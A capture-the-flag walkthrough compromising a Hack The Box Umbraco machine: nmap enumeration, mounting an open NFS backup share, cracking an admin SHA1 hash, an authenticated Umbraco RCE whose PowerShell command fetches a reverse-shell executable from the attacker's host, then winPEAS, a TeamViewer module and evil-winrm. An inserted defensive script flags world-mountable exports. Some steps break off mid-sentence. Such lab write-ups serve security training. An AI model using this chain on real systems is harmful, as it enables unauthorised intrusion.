Port Scanning and general enumeration (Nmap, Umbraco)
nmap -sC -sV -oN nmap/initial -T4 10.10.10.180
Interesting. FTP, a web server and maybe some NFS shares we can mount?
Let’s take a look at the site
Looks like some sort of blog.. ‘Umbraco’?
So we’ve found a login form. Nice. Default creds didn’t work, so we’ll come back to this.
Let’s see if there’s anything to mount
Interesting! Let’s mount it
sudo mount -t nfs 10.10.10.180:/site_backups /path/to/where/you/want/to/save/it
Full site backup!
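From the defender's side, the finding here is an export that any host can mount. The script below is an added example, not part of the original writeup: it reads `showmount -e` output and lists the exports open to everyone. The sample output, host names and the set of "any host" markers it checks are assumptions.

```bash
#!/bin/sh
# Added example: list NFS exports that every host is allowed to mount.
# Feed it the text printed by `showmount -e <server>`.

# Constructed sample output; host names and paths are illustrative only.
sample_exports() {
cat <<'EOF'
Export list for fileserver.example:
/site_backups (everyone)
/home         192.0.2.0/24
/srv/build    ci01.example,ci02.example
/pub          *
EOF
}

# Prints "<path><TAB><matching client>" for each open export.
# Returns 0 if at least one open export was found, 1 if none.
# Assumption: export paths contain no whitespace.
open_exports() {
  awk '
    /^Export list for/ { next }          # header line
    NF == 0            { next }          # blank line
    {
      path = $1
      clients = $0
      sub(/^[^ \t]+[ \t]*/, "", clients) # drop the path, keep the client list
      n = split(clients, c, /[ \t]*,[ \t]*/)
      for (i = 1; i <= n; i++) {
        t = tolower(c[i])
        gsub(/[ \t]/, "", t)
        # Markers that mean "any host" (assumed set, extend as needed).
        if (t == "*" || t == "(everyone)" || t == "everyone" ||
            t == "0.0.0.0/0" || t == "::/0") {
          print path "\t" c[i]
          found = 1
          break
        }
      }
    }
    END { exit(found ? 0 : 1) }
  '
}

# Demo on the constructed sample. Live use: showmount -e <server> | open_exports
sample_exports | open_exports || echo "no open exports"
```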
Since we know the backend is Umbraco, we can find the version in the Web.config file and credentials in the
To get the credentials we can run strings on the Umbraco.sdf file, redirect it to a file and run head on that file
So the admin password is a SHA1 hash. Let’s crack it and log in using Admin@htb.local:cracked-password in the forms we found earlier.
Access (Umbraco RCE, msfvenom)
So now that we’re authenticated we have a little more room to play with things. I found this Umbraco RCE script that should be perfect
Nice! So now we have remote code execution. Let’s get a proper shell
Stand up a simple Python HTTP server and use the exploit to transfer our executable to the machine
python3 exploit.py -u firstname.lastname@example.org -p password -i 'http://10.10.10.180' -c powershell.exe -a '-NoProfile -Command Invoke-WebRequest -Uri http://10.10.14.22:8000/rev.exe -OutFile C:/Users/Public/rev.exe'
Now that our shell is on the box, let’s fire up a
Trigger the shell and off we go
Privesc (winPEAS, evil-winrm)
Now that we’re on the box, let’s do some enumeration. I like winPEAS
Upload and run it
Interesting. Teamviewer7 also has a metasploit module. Let’s see what that has for us
Background your meterpreter session and
Could that be the Admin password? Let’s check using evil-winrm